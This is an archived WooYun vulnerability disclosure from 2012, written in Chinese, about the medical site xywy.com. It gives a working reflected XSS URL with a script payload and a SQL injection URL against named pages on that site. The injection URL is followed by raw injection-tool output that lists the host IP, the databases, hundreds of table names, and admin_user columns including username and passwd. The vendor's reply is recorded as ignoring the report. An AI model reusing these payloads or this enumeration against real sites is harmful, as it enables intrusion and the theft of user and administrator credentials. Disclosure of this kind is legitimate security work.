乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2012-06-06: 细节已通知厂商并且等待厂商处理中 2012-06-11: 厂商已经主动忽略漏洞,细节向公众公开
首先为什么要评18分呢?因为是看站点来的。剑心,你就别说俺了。希望国内能够重视乌云,重视安全,重视白帽子!详情请见说明。
XSS跨站
http://club.xywy.com/zjzx/?type=list&cq=%22%3E%3Cscript%3Ealert%280604795%29%3B%3C/script%3E
注射漏洞:
http://c1.xywy.com/huodong/yspx/medal_team.php?id=326
Analyzing http://c1.xywy.com/huodong/yspx/medal_team.php?id=326Host IP: 115.182.68.232Web Server: XT-server/0.0Powered-by: PHP/5.2.14p1Can not find keyword but let me do a try!I guess injection type is Integer?! If injection failed, retry with a manual keyword.Can't find db server type! But maybe there be some chances! [-o<Selected Column Count is 6Valid String Column is 1DB Server: MySQLCurrent DB: clubCount(table_name) of information_schema.tables where table_schema=0x636C7562 is 344Can not get all tables by group_concat!Count(table_name) of information_schema.tables where table_schema=0x636C7562 is 344Canceling...Job Canceled!Data Base Found: information_schemaData Base Found: clubData Base Found: new_clubCount(table_name) of information_schema.tables where table_schema=0x6E65775F636C7562 is 0Table found: active_manageCount(column_name) of information_schema.columns where table_schema=0x6E65775F636C7562 and table_name=0x6163746976655F6D616E616765 is 0Column found: idCount(table_name) of information_schema.tables where table_schema=0x636C7562 is 344Table found: 111_doctor_stats_tempTable found: 111_questionTable found: 111_question_detailTable found: 111_replyTable found: 111_tmpTable found: 111_tmpdirTable found: BoxItemTable found: TopBoxTable found: acceptelecTable found: act_eggTable found: act_egg_backTable found: act_egg_cardTable found: act_egg_tmpTable found: active_manageTable found: admin_funTable found: admin_fun_newTable found: admin_groupTable found: admin_group_fun_newTable found: admin_group_newTable found: admin_logTable found: admin_userTable found: admin_user_funTable found: admin_user_logTable found: admin_user_newTable found: admin_user_postTable found: admin_user_post_bakTable found: admin_user_statusTable found: agree_count_dataTable found: articleTable found: attention_numTable found: audit_time_setTable found: baidu_questionTable found: baidu_question_tempTable found: bak_20120523_questionTable found: bak_20120523_question_detailTable found: bak_20120523_question_picTable found: bak_20120523_replyTable found: banzhu_job_statTable found: bbs_topicTable found: bbsconfigTable found: blog_clickTable found: blog_commendTable found: blog_commonTable found: blog_replyTable found: blog_sortTable found: blog_uTable found: boxitemTable found: business_clubTable found: ceng_click_countTable found: chat_log_pigeonholeTable found: chat_statisticsTable found: chatdoctorlistTable found: chatinfoTable found: chatlistTable found: chattempTable found: choose_tempTable found: chunjie_huodongTable found: chunjie_huojiangTable found: commendTable found: commend_detailTable found: commend_detail_tempTable found: commend_doctorTable found: commend_doctor_newTable found: confident_tempTable found: count_sendrecordTable found: count_sendrecord_tmpTable found: date_noticeTable found: del_dataTable found: deluserTable found: depart_rightTable found: dialogTable found: doc_tp_dayTable found: doc_tp_monthTable found: doc_tp_tempTable found: doc_tp_weekTable found: doctor_cardTable found: doctor_card_assignTable found: doctor_handleTable found: doctor_medal_spreadTable found: doctor_statTable found: doctor_stat_20110923Table found: doctor_stat_20110927Table found: doctor_stat_20110930Table found: doctor_stat_20111208Table found: doctor_stat_20120101Table found: doctor_stat_20120102Table found: doctor_stat_20120114Table found: doctor_stat_20120125Table found: doctor_stat_20120406Table found: doctor_stat_20120422mTable found: doctor_stat_bak20120221Table found: doctor_stat_maliuTable found: doctor_stat_maliu_bakTable found: doctor_stat_monthTable found: doctor_stat_month_0523Table found: doctor_stat_month_0601Table found: doctor_stat_month_0602Table found: doctor_stat_month_0603Table found: doctor_stat_month_bakTable found: doctor_stat_oldTable found: doctor_stats_backupTable found: doctor_stats_tempTable found: doctor_stats_temp_20120422mTable found: doctor_subjectTable found: exchangeTable found: expert_onlineTable found: expert_online_timeTable found: extend_keywordTable found: favor_docTable found: favor_drugTable found: favor_drug_shopTable found: favor_hospitalTable found: favor_jbillTable found: favoriteTable found: favorite_folderTable found: fill_keywordTable found: fill_keyword_0606Table found: fill_keyword_delTable found: fill_keyword_lockTable found: fill_keywords_skipTable found: fill_questionTable found: fill_question_bakTable found: filter_detailTable found: filter_notifyTable found: filter_questionTable found: friendTable found: getbbs_pointTable found: heath_awokeTable found: home_countTable found: home_guide_countTable found: hospital_doc_linkTable found: hospital_questionTable found: hospital_question_tempTable found: hot_infomationTable found: huodong2008Table found: huodong_2011Table found: id_keywordTable found: ill_to_subjectTable found: index_adminTable found: index_cengTable found: invite_friendTable found: ip_denyTable found: jfsc_classTable found: jfsc_class_20110929Table found: jfsc_exchangeTable found: jfsc_exchange_detailTable found: jfsc_productTable found: jfsc_proimgTable found: josso_roleTable found: josso_user_propertyTable found: josso_user_roleTable found: keywordTable found: keyword_adTable found: keyword_ad_newTable found: keyword_ad_userTable found: keyword_denyTable found: keyword_deny_bakTable found: keyword_deny_tmpTable found: keyword_iniTable found: messageTable found: messageoldTable found: new_doctor_commendTable found: pointTable found: point22Table found: point_20111008Table found: point_processTable found: point_process_backup20091221Table found: point_process_bakTable found: point_process_testTable found: point_tempTable found: point_tmpTable found: presendTable found: productTable found: proxy_client_apiTable found: qq_groupTable found: que_agree_countTable found: ques_zjtTable found: questionTable found: question091101Table found: question091101_attachTable found: question091101_detailTable found: question091101_picTable found: question091101_replyTable found: question100501Table found: question100501_attachTable found: question100501_detailTable found: question100501_picTable found: question100501_replyTable found: question101001Table found: question101001_attachTable found: question101001_detailTable found: question101001_picTable found: question101001_replyTable found: question110201Table found: question110201_attachTable found: question110201_detailTable found: question110201_picTable found: question110201_replyTable found: question110719Table found: question110719_attachTable found: question110719_detailTable found: question110719_picTable found: question110719_replyTable found: question110814Table found: question110814_attachTable found: question110814_detailTable found: question110814_picTable found: question110814_replyTable found: question110922Table found: question110922_attachTable found: question110922_detailTable found: question110922_picTable found: question110922_replyTable found: question111202Table found: question111202_attachTable found: question111202_detailTable found: question111202_picTable found: question111202_replyTable found: question120202Table found: question120202_attachTable found: question120202_detailTable found: question120202_picTable found: question120202_replyTable found: question120523Table found: question120523_attachTable found: question120523_detailTable found: question120523_picTable found: question120523_replyTable found: question_0814_bakTable found: question_20110916Table found: question_attachTable found: question_attach_oldTable found: question_attach_tmpTable found: question_broadcastTable found: question_delTable found: question_del_stat_backupTable found: question_del_stat_tempTable found: question_detailTable found: question_detail_0814_bakTable found: question_detail_newTable found: question_detail_tmp_bakTable found: question_eliteTable found: question_elite_tempTable found: question_fristpageTable found: question_hos_docTable found: question_hos_doc_tmpTable found: question_jibTable found: question_newTable found: question_passTable found: question_picTable found: question_pic_0814_bakTable found: question_pic_newTable found: question_pic_tmp_bakTable found: question_recycleTable found: question_reply_lockTable found: question_reply_timeTable found: question_shortmsg_setTable found: question_tempTable found: question_tmp_bakTable found: question_total_dayTable found: question_total_subjectTable found: question_total_subject_comebackTable found: question_total_tmpTable found: questionoldTable found: questionold090228Table found: questionold090228_attachTable found: questionold090228_detailTable found: questionold090228_picTable found: questionold090228_replyTable found: questionold_attachTable found: questionold_detailTable found: questionold_picTable found: questionold_replyTable found: quick_questionTable found: range_keywordsTable found: rational_to_questionTable found: receive_msgTable found: record_spaceTable found: replyTable found: reply_0814_bakTable found: reply_201205211251Table found: reply_del_tempTable found: reply_newTable found: reply_recycleTable found: reply_taolunTable found: reply_taolun_194Table found: reply_tempTable found: reply_tmp_bakTable found: search_historyTable found: search_keywordTable found: search_keyword_sellTable found: search_keyword_sell_preTable found: search_questionTable found: search_question_xgTable found: send_emailTable found: shortmsg_infoTable found: shortmsg_send_countTable found: sina_userTable found: soft_offonTable found: soft_rTable found: subject_ownerTable found: subyqljTable found: system_msg_readruserTable found: tag_keywordTable found: tmp_hospitalTable found: tmpppTable found: topboxTable found: topics_actionsTable found: tousuTable found: user_act_emailTable found: user_actionTable found: user_action_20110908Table found: user_action_20120502Table found: user_action_replyTable found: user_albumTable found: user_album_folderTable found: user_attentionTable found: user_blogTable found: user_blog_bakTable found: user_blog_kindTable found: user_callinTable found: user_common_infoTable found: user_common_newTable found: user_doctor_infoTable found: user_doctor_newTable found: user_doctor_reply_tuanTable found: user_jobTable found: user_link_rrTable found: user_newTable found: user_settingTable found: user_setting_backTable found: user_timeTable found: user_work_infoTable found: user_youke_newTable found: wb_addressTable found: wb_answer_logTable found: wb_cardTable found: wb_faveriteTable found: wb_get_faverite_logTable found: whx_testTable found: youjiangdiaochaTable found: youjiangdiaocha_peopleTable found: youjiangdiaocha_tongjiTable found: zhaopinCount(column_name) of information_schema.columns where table_schema=0x636C7562 and table_name=0x61646D696E5F75736572 is 7Column found: idColumn found: pidColumn found: usernameColumn found: passwdColumn found: createtimeColumn found: subjectColumn found: userid
加强安全体系!!!树立安全意识!
危害等级:无影响厂商忽略
忽略时间:2012-06-11 13:01
2012-06-11:多谢提醒了~
